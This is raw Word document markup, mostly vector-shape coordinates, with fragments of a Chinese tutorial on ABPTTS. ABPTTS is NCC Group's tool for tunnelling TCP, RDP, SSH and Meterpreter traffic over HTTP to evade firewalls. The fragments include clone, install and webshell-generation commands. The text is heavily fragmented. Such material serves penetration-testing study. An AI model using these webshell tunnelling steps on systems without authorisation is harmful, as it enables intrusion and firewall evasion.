5332,2758,15332,2757,15332,2755,15332,2754,15332,2753,15332,2752,15332,2750,15332,2749,15332,2748,15332,2746,15332,2745,15332,2743,15332,2742,15332,2740,15332,2738,15332,2737,15332,2735,15332,2733,15332,2732,15332,2730,15332,2728,15332,2726,15332,2724,15332,2722,15332,2720,15332,2718,15332,2716,15332,2714,15332,2712,15332,2710,15332,2708,15332,2705,15332,2703,15332,2701,15332,2698,15332,2696,15332,2693,15332,2691,15332,2688,15332,2685,15332,2683,15332,2680,15332,2677,15332,2674,15332,2671,15332,2668,15332,2665,15332,2665,15332,2665,15332,2665,15332,2665,15332,2665,15332,2665,15332,2665,15332,2665,15332,2665,15332,2665,15332,2665,15332,2665,15332,2665,15331,2665,15331,2665,15331,2665,15331,2665,15331,2665,15331,2665,15331,2665,15331,2665,15331,2665,15330,2665,15330,2665,15330,2665,15330,2665,15329,2665,15329,2665,15329,2665,15328,2665,15328,2665,15328,2665,15327,2665,15327,2665,15326,2665,15326,2665,15325,2665,15325,2665,15324,2665,15323,2665,15323,2665,15322,2665,15321,2665,15321,2665,15320,2665,15319,2665,15318,2665,15317,2665,15316,2665,15315,2665,15314,2665,15313,2665,15312,2665,15310,2665,15309,2665,15308,2665,15307,2665,15305,2665,15304,2665,15302,2665,15301,2665,15299,2665,15297,2665,15296,2665,15294,2665,15292,2665,15290,2665,15288,2665,15286,2665,15284,2665,15282,2665,15280,2665,15278,2665,15275,2665,15273,2665,15270,2665,15268,2665,15265,2665,15263,2665,15260,2665,15257,2665,15254,2665,15251,2665,15248,2665,15245,2665,15242,2665,15239,2665,15235,2665,15232,2665,15229,2665,15225,2665,15221,2665,15218,2665,15214,2665,15210,2665,15206,2665,15202,2665,15198,2665,15194,2665,15189,2665,15185,2665,15180,2665,15176,2665,15171,2665,15166,2665,15161,2665,15156,2665,15151,2665,15146,2665,15141,2665,15136,2665,15130,2665,15125,2665,15119,2665,15113,2665,15107,2665,15101,2665,15095,2665,15089,2665,15083,2665,15077e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:150.500pt;margin-top:752.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3010,15050" coordsize="130,270">
        <v:shape style="position:absolute;left:3010;top:15050;width:130;height:270" coordorigin="3010,15050" coordsize="130,270" path="m3026,15077l3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3026,15077,3027,15077,3027,15077,3027,15077,3027,15077,3027,15077,3027,15077,3027,15077,3028,15077,3028,15077,3028,15077,3028,15077,3029,15077,3029,15077,3029,15077,3029,15077,3030,15077,3030,15077,3030,15077,3031,15077,3031,15077,3032,15077,3032,15077,3032,15077,3033,15077,3033,15077,3034,15077,3034,15077,3035,15077,3036,15077,3036,15077,3037,15077,3037,15077,3038,15077,3039,15077,3039,15077,3040,15077,3041,15077,3042,15077,3043,15077,3043,15077,3044,15077,3045,15077,3046,15077,3047,15077,3048,15077,3049,15077,3050,15077,3051,15077,3052,15077,3053,15077,3054,15077,3056,15077,3057,15077,3058,15077,3059,15077,3061,15077,3062,15077,3063,15077,3065,15077,3066,15077,3068,15077,3069,15077,3071,15077,3072,15077,3074,15077,3076,15077,3077,15077,3079,15077,3081,15077,3083,15077,3085,15077,3087,15077,3089,15077,3091,15077,3093,15077,3095,15077,3097,15077,3099,15077,3101,15077,3103,15077,3106,15077,3108,15077,3110,15077,3113,15077,3115,15077,3118,15077,3120,15077,3123,15077,3126,15077,3128,15077,3131,15077,3134,15077,3137,15077,3140,15077,3143,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15077,3146,15078,3146,15078,3146,15078,3146,15078,3146,15078,3146,15079,3146,15079,3146,15079,3146,15080,3146,15080,3146,15080,3146,15081,3146,15081,3146,15082,3146,15082,3146,15083,3146,15083,3146,15084,3146,15084,3146,15085,3146,15086,3146,15086,3146,15087,3146,15088,3146,15089,3146,15089,3146,15090,3146,15091,3146,15092,3146,15093,3146,15094,3146,15096,3146,15097,3146,15098,3146,15099,3146,15100,3146,15102,3146,15103,3146,15105,3146,15106,3146,15108,3146,15109,3146,15111,3146,15113,3146,15114,3146,15116,3146,15118,3146,15120,3146,15122,3146,15124,3146,15126,3146,15129,3146,15131,3146,15133,3146,15135,3146,15138,3146,15140,3146,15143,3146,15146,3146,15148,3146,15151,3146,15154,3146,15157,3146,15160,3146,15163,3146,15166,3146,15170,3146,15173,3146,15176,3146,15180,3146,15183,3146,15187,3146,15191,3146,15194,3146,15198,3146,15202,3146,15206,3146,15211,3146,15215,3146,15219,3146,15223,3146,15228,3146,15233,3146,15237,3146,15242,3146,15247,3146,15252,3146,15257,3146,15262,3146,15267,3146,15273,3146,15278,3146,15284,3146,15289,3146,15295,3146,15301,3146,15307,3146,15313,3146,15319,3146,15325,3146,15332,3146,15332,3146,15332,3146,15332,3146,15332,3146,15332,3146,15332,3146,15332,3146,15332,3146,15332,3146,15332,3146,15332,3145,15332,3145,15332,3145,15332,3145,15332,3145,15332,3145,15332,3145,15332,3145,15332,3145,15332,3145,15332,3145,15332,3145,15332,3145,15332,3145,15332,3144,15332,3144,15332,3144,15332,3144,15332,3144,15332,3144,15332,3143,15332,3143,15332,3143,15332,3143,15332,3143,15332,3142,15332,3142,15332,3142,15332,3141,15332,3141,15332,3141,15332,3140,15332,3140,15332,3140,15332,3139,15332,3139,15332,3138,15332,3138,15332,3137,15332,3137,15332,3136,15332,3136,15332,3135,15332,3134,15332,3134,15332,3133,15332,3132,15332,3132,15332,3131,15332,3130,15332,3129,15332,3129,15332,3128,15332,3127,15332,3126,15332,3125,15332,3124,15332,3123,15332,3122,15332,3121,15332,3120,15332,3119,15332,3118,15332,3117,15332,3116,15332,3114,15332,3113,15332,3112,15332,3110,15332,3109,15332,3108,15332,3106,15332,3105,15332,3103,15332,3102,15332,3100,15332,3099,15332,3097,15332,3095,15332,3094,15332,3092,15332,3090,15332,3088,15332,3086,15332,3084,15332,3083,15332,3081,15332,3079,15332,3076,15332,3074,15332,3072,15332,3070,15332,3068,15332,3065,15332,3063,15332,3061,15332,3058,15332,3056,15332,3053,15332,3051,15332,3048,15332,3045,15332,3043,15332,3040,15332,3037,15332,3034,15332,3031,15332,3029,15332,3026,15332,3026,15332,3026,15332,3026,15332,3026,15332,3026,15332,3026,15332,3026,15332,3026,15332,3026,15332,3026,15332,3026,15332,3026,15332,3026,15331,3026,15331,3026,15331,3026,15331,3026,15331,3026,15331,3026,15331,3026,15331,3026,15331,3026,15330,3026,15330,3026,15330,3026,15330,3026,15329,3026,15329,3026,15329,3026,15328,3026,15328,3026,15328,3026,15327,3026,15327,3026,15326,3026,15326,3026,15325,3026,15325,3026,15324,3026,15323,3026,15323,3026,15322,3026,15321,3026,15321,3026,15320,3026,15319,3026,15318,3026,15317,3026,15316,3026,15315,3026,15314,3026,15313,3026,15312,3026,15310,3026,15309,3026,15308,3026,15307,3026,15305,3026,15304,3026,15302,3026,15301,3026,15299,3026,15297,3026,15296,3026,15294,3026,15292,3026,15290,3026,15288,3026,15286,3026,15284,3026,15282,3026,15280,3026,15278,3026,15275,3026,15273,3026,15270,3026,15268,3026,15265,3026,15263,3026,15260,3026,15257,3026,15254,3026,15251,3026,15248,3026,15245,3026,15242,3026,15239,3026,15235,3026,15232,3026,15229,3026,15225,3026,15221,3026,15218,3026,15214,3026,15210,3026,15206,3026,15202,3026,15198,3026,15194,3026,15189,3026,15185,3026,15180,3026,15176,3026,15171,3026,15166,3026,15161,3026,15156,3026,15151,3026,15146,3026,15141,3026,15136,3026,15130,3026,15125,3026,15119,3026,15113,3026,15107,3026,15101,3026,15095,3026,15089,3026,15083,3026,15077e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:450.500pt;margin-top:752.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="9010,15050" coordsize="250,270">
        <v:shape style="position:absolute;left:9010;top:15050;width:250;height:270" coordorigin="9010,15050" coordsize="250,270" path="m9029,15077l9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9029,15077,9030,15077,9030,15077,9030,15077,9030,15077,9030,15077,9031,15077,9031,15077,9031,15077,9031,15077,9032,15077,9032,15077,9032,15077,9033,15077,9033,15077,9034,15077,9034,15077,9035,15077,9035,15077,9036,15077,9036,15077,9037,15077,9038,15077,9038,15077,9039,15077,9040,15077,9041,15077,9042,15077,9042,15077,9043,15077,9044,15077,9045,15077,9046,15077,9047,15077,9049,15077,9050,15077,9051,15077,9052,15077,9054,15077,9055,15077,9056,15077,9058,15077,9059,15077,9061,15077,9063,15077,9064,15077,9066,15077,9068,15077,9070,15077,9071,15077,9073,15077,9075,15077,9077,15077,9080,15077,9082,15077,9084,15077,9086,15077,9089,15077,9091,15077,9094,15077,9096,15077,9099,15077,9102,15077,9104,15077,9107,15077,9110,15077,9113,15077,9116,15077,9119,15077,9122,15077,9126,15077,9129,15077,9132,15077,9136,15077,9140,15077,9143,15077,9147,15077,9151,15077,9155,15077,9159,15077,9163,15077,9167,15077,9171,15077,9175,15077,9180,15077,9184,15077,9189,15077,9194,15077,9198,15077,9203,15077,9208,15077,9213,15077,9218,15077,9223,15077,9229,15077,9234,15077,9240,15077,9245,15077,9251,15077,9257,15077,9263,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15077,9269,15078,9269,15078,9269,15078,9269,15078,9269,15078,9269,15079,9269,15079,9269,15079,9269,15080,9269,15080,9269,15080,9269,15081,9269,15081,9269,15082,9269,15082,9269,15083,9269,15083,9269,15084,9269,15084,9269,15085,9269,15086,9269,15086,9269,15087,9269,15088,9269,15089,9269,15089,9269,15090,9269,15091,9269,15092,9269,15093,9269,15094,9269,15096,9269,15097,9269,15098,9269,15099,9269,15100,9269,15102,9269,15103,9269,15105,9269,15106,9269,15108,9269,15109,9269,15111,9269,15113,9269,15114,9269,15116,9269,15118,9269,15120,9269,15122,9269,15124,9269,15126,9269,15129,9269,15131,9269,15133,9269,15135,9269,15138,9269,15140,9269,15143,9269,15146,9269,15148,9269,15151,9269,15154,9269,15157,9269,15160,9269,15163,9269,15166,9269,15170,9269,15173,9269,15176,9269,15180,9269,15183,9269,15187,9269,15191,9269,15194,9269,15198,9269,15202,9269,15206,9269,15211,9269,15215,9269,15219,9269,15223,9269,15228,9269,15233,9269,15237,9269,15242,9269,15247,9269,15252,9269,15257,9269,15262,9269,15267,9269,15273,9269,15278,9269,15284,9269,15289,9269,15295,9269,15301,9269,15307,9269,15313,9269,15319,9269,15325,9269,15332,9269,15332,9269,15332,9269,15332,9269,15332,9269,15332,9269,15332,9269,15332,9269,15332,9269,15332,9269,15332,9269,15332,9268,15332,9268,15332,9268,15332,9268,15332,9268,15332,9268,15332,9268,15332,9268,15332,9268,15332,9268,15332,9267,15332,9267,15332,9267,15332,9267,15332,9266,15332,9266,15332,9266,15332,9266,15332,9265,15332,9265,15332,9264,15332,9264,15332,9264,15332,9263,15332,9263,15332,9262,15332,9261,15332,9261,15332,9260,15332,9260,15332,9259,15332,9258,15332,9257,15332,9257,15332,9256,15332,9255,15332,9254,15332,9253,15332,9252,15332,9251,15332,9250,15332,9249,15332,9247,15332,9246,15332,9245,15332,9244,15332,9242,15332,9241,15332,9239,15332,9238,15332,9236,15332,9235,15332,9233,15332,9231,15332,9230,15332,9228,15332,9226,15332,9224,15332,9222,15332,9220,15332,9218,15332,9215,15332,9213,15332,9211,15332,9209,15332,9206,15332,9204,15332,9201,15332,9198,15332,9196,15332,9193,15332,9190,15332,9187,15332,9184,15332,9181,15332,9178,15332,9175,15332,9172,15332,9168,15332,9165,15332,9161,15332,9158,15332,9154,15332,9150,15332,9147,15332,9143,15332,9139,15332,9135,15332,9130,15332,9126,15332,9122,15332,9117,15332,9113,15332,9108,15332,9104,15332,9099,15332,9094,15332,9089,15332,9084,15332,9079,15332,9074,15332,9068,15332,9063,15332,9058,15332,9052,15332,9046,15332,9040,15332,9035,15332,9029,15332,9029,15332,9029,15332,9029,15332,9029,15332,9029,15332,9029,15332,9029,15332,9029,15332,9029,15332,9029,15332,9029,15332,9029,15332,9029,15331,9029,15331,9029,15331,9029,15331,9029,15331,9029,15331,9029,15331,9029,15331,9029,15331,9029,15330,9029,15330,9029,15330,9029,15330,9029,15329,9029,15329,9029,15329,9029,15328,9029,15328,9029,15328,9029,15327,9029,15327,9029,15326,9029,15326,9029,15325,9029,15325,9029,15324,9029,15323,9029,15323,9029,15322,9029,15321,9029,15321,9029,15320,9029,15319,9029,15318,9029,15317,9029,15316,9029,15315,9029,15314,9029,15313,9029,15312,9029,15310,9029,15309,9029,15308,9029,15307,9029,15305,9029,15304,9029,15302,9029,15301,9029,15299,9029,15297,9029,15296,9029,15294,9029,15292,9029,15290,9029,15288,9029,15286,9029,15284,9029,15282,9029,15280,9029,15278,9029,15275,9029,15273,9029,15270,9029,15268,9029,15265,9029,15263,9029,15260,9029,15257,9029,15254,9029,15251,9029,15248,9029,15245,9029,15242,9029,15239,9029,15235,9029,15232,9029,15229,9029,15225,9029,15221,9029,15218,9029,15214,9029,15210,9029,15206,9029,15202,9029,15198,9029,15194,9029,15189,9029,15185,9029,15180,9029,15176,9029,15171,9029,15166,9029,15161,9029,15156,9029,15151,9029,15146,9029,15141,9029,15136,9029,15130,9029,15125,9029,15119,9029,15113,9029,15107,9029,15101,9029,15095,9029,15089,9029,15083,9029,1507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7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ABPTTS简</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="16"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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33" w:firstLine="483"/>
      </w:pP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ABPTTS是NCC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Group在2016年blackhat推出的一款将TCP流量通过HTTP/HTTPS进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行流量转发，在目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>前云主机的大环境中，发挥了比较重要的作用，可以通过脚本进行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RDP,SSH,Meterpreter的交互与连接。也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意味着这样可以建立一个通过80端口得流量出站来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逃避防</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>火墙。与其它http隧道不同的是，abptts是全加密。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2016年blackha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t介绍：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4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https://www.blackhat.com/us-16/arsenal.html#a-black-path-to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>ward-the-sun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Githu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>b：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8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https:/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>/github.com/nccgroup/ABPTTS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5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>安装与生成payl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>oad：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git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clone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https://github.com/nccgroup/ABPTTS.git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Cloning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into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'ABPTTS'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Enumerating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50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Total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delta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reused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delta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pack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reused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Unpacking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50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50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7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pip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install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pycrypto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Requirement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already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satisfied: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pycrypto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usr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lib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python2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7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dist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pac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kages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2.6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8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cd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ABPTTS/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8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ABPTTS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="13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ls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abpttsclient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abpttsfactory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ABPTTS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Manual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pdf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data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libabptts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icense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txt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README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settings_overlays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template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ABPTTS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="11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python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abpttsfactory.py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webshell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28.131919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‐‐‐===[[[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Black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Path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Toward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]]]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===‐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‐‐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28.131954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‐‐==[[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1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Factory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2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]]==‐‐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28.131965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Lincoln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NCC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Group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28.131979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Version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1.0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2016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07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30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28.132706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Output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files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will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"/root/AB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PT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TS/webshell"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354.653pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,7093">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:7093" coordorigin="10402,0" coordsize="0,7093" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,4,10402,5,10402,7,10402,9,10402,11,10402,14,10402,17,10402,20,10402,24,10402,28,10402,33,10402,38,10402,44,10402,51,10402,58,10402,65,10402,73,10402,82,10402,92,10402,102,10402,113,10402,125,10402,137,10402,151,10402,165,10402,180,10402,196,10402,213,10402,230,10402,249,10402,269,10402,290,10402,311,10402,334,10402,358,10402,383,10402,409,10402,437,10402,465,10402,495,10402,526,10402,558,10402,591,10402,626,10402,662,10402,700,10402,739,10402,779,10402,821,10402,864,10402,909,10402,955,10402,1003,10402,1052,10402,1103,10402,1155,10402,1210,10402,1265,10402,1323,10402,1382,10402,1443,10402,1506,10402,1571,10402,1637,10402,1705,10402,1775,10402,1847,10402,1921,10402,1997,10402,2075,10402,2155,10402,2236,10402,2320,10402,2406,10402,2494,10402,2584,10402,2677,10402,2771,10402,2868,10402,2967,10402,3068,10402,3171,10402,3277,10402,3385,10402,3496,10402,3608,10402,3723,10402,3841,10402,3961,10402,4084,10402,4209,10402,4336,10402,4466,10402,4599,10402,4734,10402,4872,10402,5013,10402,5156,10402,5302,10402,5450,10402,5602,10402,5756,10402,5913,10402,6073,10402,6236,10402,6401,10402,6570,10402,6741,10402,6915,10402,7093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4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4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3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17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,6730" coordsize="8990,350">
        <v:shape style="position:absolute;left:1490;top:6730;width:8990;height:350" coordorigin="1490,6730" coordsize="8990,35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7,10484,6748,10484,6748,10484,6748,10484,6748,10484,6748,10484,6748,10484,6748,10484,6748,10484,6748,10484,6748,10484,6749,10484,6749,10484,6749,10484,6749,10484,6750,10484,6750,10484,6750,10484,6751,10484,6751,10484,6751,10484,6752,10484,6752,10484,6753,10484,6753,10484,6754,10484,6755,10484,6755,10484,6756,10484,6757,10484,6758,10484,6759,10484,6760,10484,6761,10484,6762,10484,6763,10484,6764,10484,6765,10484,6766,10484,6767,10484,6769,10484,6770,10484,6771,10484,6773,10484,6775,10484,6776,10484,6778,10484,6780,10484,6781,10484,6783,10484,6785,10484,6787,10484,6789,10484,6792,10484,6794,10484,6796,10484,6799,10484,6801,10484,6804,10484,6806,10484,6809,10484,6812,10484,6815,10484,6818,10484,6821,10484,6824,10484,6827,10484,6830,10484,6834,10484,6837,10484,6841,10484,6845,10484,6848,10484,6852,10484,6856,10484,6860,10484,6865,10484,6869,10484,6873,10484,6878,10484,6882,10484,6887,10484,6892,10484,6897,10484,6902,10484,6907,10484,6912,10484,6918,10484,6923,10484,6929,10484,6934,10484,6940,10484,6946,10484,6952,10484,6958,10484,6965,10484,6971,10484,6978,10484,6985,10484,6991,10484,6998,10484,7005,10484,7013,10484,7020,10484,7028,10484,7035,10484,7043,10484,7051,10484,7059,10484,7067,10484,7075,10484,7084,10484,7093,10484,7093,10484,7093,10484,7093,10484,7093,10484,7093,10484,7093,10483,7093,10482,7093,10482,7093,10480,7093,10479,7093,10477,7093,10475,7093,10473,7093,10470,7093,10466,7093,10462,7093,10458,7093,10453,7093,10448,7093,10442,7093,10435,7093,10428,7093,10419,7093,10411,7093,10401,7093,10391,7093,10379,7093,10367,7093,10354,7093,10340,7093,10326,7093,10310,7093,10293,7093,10275,7093,10256,7093,10236,7093,10215,7093,10192,7093,10168,7093,10143,7093,10117,7093,10090,7093,10061,7093,10031,7093,9999,7093,9966,7093,9931,7093,9895,7093,9858,7093,9819,7093,9778,7093,9735,7093,9691,7093,9646,7093,9598,7093,9549,7093,9498,7093,9445,7093,9391,7093,9334,7093,9275,7093,9215,7093,9153,7093,9088,7093,9022,7093,8953,7093,8883,7093,8810,7093,8735,7093,8658,7093,8578,7093,8497,7093,8413,7093,8326,7093,8238,7093,8146,7093,8053,7093,7957,7093,7859,7093,7758,7093,7654,7093,7548,7093,7439,7093,7328,7093,7214,7093,7097,7093,6977,7093,6855,7093,6730,7093,6602,7093,6471,7093,6337,7093,6201,7093,6061,7093,5918,7093,5773,7093,5624,7093,5472,7093,5317,7093,5159,7093,4997,7093,4833,7093,4665,7093,4494,7093,4319,7093,4141,7093,3960,7093,3776,7093,3587,7093,3396,7093,3201,7093,3002,7093,2800,7093,2594,7093,2385,7093,2172,7093,1955,7093,1734,7093,1510,7093,1510,7093,1510,7093,1510,7093,1510,7093,1510,7093,1510,7093,1510,7093,1510,7093,1510,7092,1510,7092,1510,7092,1510,7092,1510,7092,1510,7092,1510,7092,1510,7092,1510,7092,1510,7092,1510,7091,1510,7091,1510,7091,1510,7091,1510,7090,1510,7090,1510,7090,1510,7089,1510,7089,1510,7089,1510,7088,1510,7088,1510,7087,1510,7086,1510,7086,1510,7085,1510,7085,1510,7084,1510,7083,1510,7082,1510,7081,1510,7080,1510,7079,1510,7078,1510,7077,1510,7076,1510,7075,1510,7074,1510,7073,1510,7071,1510,7070,1510,7068,1510,7067,1510,7065,1510,7064,1510,7062,1510,7060,1510,7058,1510,7057,1510,7055,1510,7053,1510,7051,1510,7048,1510,7046,1510,7044,1510,7041,1510,7039,1510,7036,1510,7034,1510,7031,1510,7028,1510,7025,1510,7022,1510,7019,1510,7016,1510,7013,1510,7010,1510,7006,1510,7003,1510,6999,1510,6995,1510,6992,1510,6988,1510,6984,1510,6980,1510,6975,1510,6971,1510,6967,1510,6962,1510,6958,1510,6953,1510,6948,1510,6943,1510,6938,1510,6933,1510,6928,1510,6922,1510,6917,1510,6911,1510,6906,1510,6900,1510,6894,1510,6888,1510,6882,1510,6875,1510,6869,1510,6862,1510,6855,1510,6849,1510,6842,1510,6835,1510,6827,1510,6820,1510,6812,1510,6805,1510,6797,1510,6789,1510,6781,1510,6773,1510,6765,1510,6756,1510,6747e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:353.500pt;width:449.500pt;height:1.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,7070" coordsize="8990,30">
        <v:shape style="position:absolute;left:1490;top:7070;width:8990;height:30" coordorigin="1490,7070" coordsize="8990,30" path="m1510,7085l1510,7085,1510,7085,1510,7085,1510,7085,1510,7085,1510,7085,1511,7085,1512,7085,1512,7085,1514,7085,1515,7085,1517,7085,1519,7085,1521,7085,1524,7085,1528,7085,1532,7085,1536,7085,1541,7085,1546,7085,1552,7085,1559,7085,1566,7085,1575,7085,1583,7085,1593,7085,1603,7085,1615,7085,1627,7085,1640,7085,1654,7085,1668,7085,1684,7085,1701,7085,1719,7085,1738,7085,1758,7085,1780,7085,1802,7085,1826,7085,1851,7085,1877,7085,1904,7085,1933,7085,1963,7085,1995,7085,2028,7085,2063,7085,2099,7085,2136,7085,2175,7085,2216,7085,2259,7085,2303,7085,2348,7085,2396,7085,2445,7085,2496,7085,2549,7085,2604,7085,2660,7085,2719,7085,2779,7085,2841,7085,2906,7085,2972,7085,3041,7085,3112,7085,3184,7085,3259,7085,3336,7085,3416,7085,3498,7085,3582,7085,3668,7085,3757,7085,3848,7085,3941,7085,4037,7085,4136,7085,4236,7085,4340,7085,4446,7085,4555,7085,4666,7085,4780,7085,4897,7085,5017,7085,5139,7085,5264,7085,5392,7085,5523,7085,5657,7085,5793,7085,5933,7085,6076,7085,6222,7085,6370,7085,6522,7085,6677,7085,6835,7085,6997,7085,7161,7085,7329,7085,7500,7085,7675,7085,7853,7085,8034,7085,8219,7085,8407,7085,8598,7085,8793,7085,8992,7085,9194,7085,9400,7085,9609,7085,9823,7085,10039,7085,10260,7085,10484,7085e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:336.600pt;width:445.800pt;height:18.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId8" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:132.500pt;margin-top:51.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2650,1030" coordsize="130,270">
        <v:shape style="position:absolute;left:2650;top:1030;width:130;height:270" coordorigin="2650,1030" coordsize="130,270" path="m2665,1045l2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2665,1045,2666,1045,2666,1045,2666,1045,2666,1045,2666,1045,2666,1045,2666,1045,2666,1045,2666,1045,2666,1045,2666,1045,2666,1045,2667,1045,2667,1045,2667,1045,2667,1045,2667,1045,2667,1045,2668,1045,2668,1045,2668,1045,2668,1045,2669,1045,2669,1045,2669,1045,2670,1045,2670,1045,2670,1045,2671,1045,2671,1045,2671,1045,2672,1045,2672,1045,2673,1045,2673,1045,2674,1045,2674,1045,2675,1045,2675,1045,2676,1045,2677,1045,2677,1045,2678,1045,2679,1045,2679,1045,2680,1045,2681,1045,2682,1045,2682,1045,2683,1045,2684,1045,2685,1045,2686,1045,2687,1045,2688,1045,2689,1045,2690,1045,2691,1045,2692,1045,2693,1045,2694,1045,2695,1045,2697,1045,2698,1045,2699,1045,2700,1045,2702,1045,2703,1045,2705,1045,2706,1045,2708,1045,2709,1045,2711,1045,2712,1045,2714,1045,2716,1045,2717,1045,2719,1045,2721,1045,2723,1045,2725,1045,2726,1045,2728,1045,2730,1045,2732,1045,2734,1045,2737,1045,2739,1045,2741,1045,2743,1045,2745,1045,2748,1045,2750,1045,2753,1045,2755,1045,2758,1045,2760,1045,2763,1045,2765,1045,2768,1045,2771,1045,2774,1045,2777,1045,2779,1045,2782,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1045,2785,1046,2785,1046,2785,1046,2785,1046,2785,1046,2785,1047,2785,1047,2785,1047,2785,1048,2785,1048,2785,1048,2785,1049,2785,1049,2785,1049,2785,1050,2785,1050,2785,1051,2785,1052,2785,1052,2785,1053,2785,1054,2785,1054,2785,1055,2785,1056,2785,1057,2785,1057,2785,1058,2785,1059,2785,1060,2785,1061,2785,1062,2785,1063,2785,1065,2785,1066,2785,1067,2785,1068,2785,1070,2785,1071,2785,1073,2785,1074,2785,1076,2785,1077,2785,1079,2785,1081,2785,1082,2785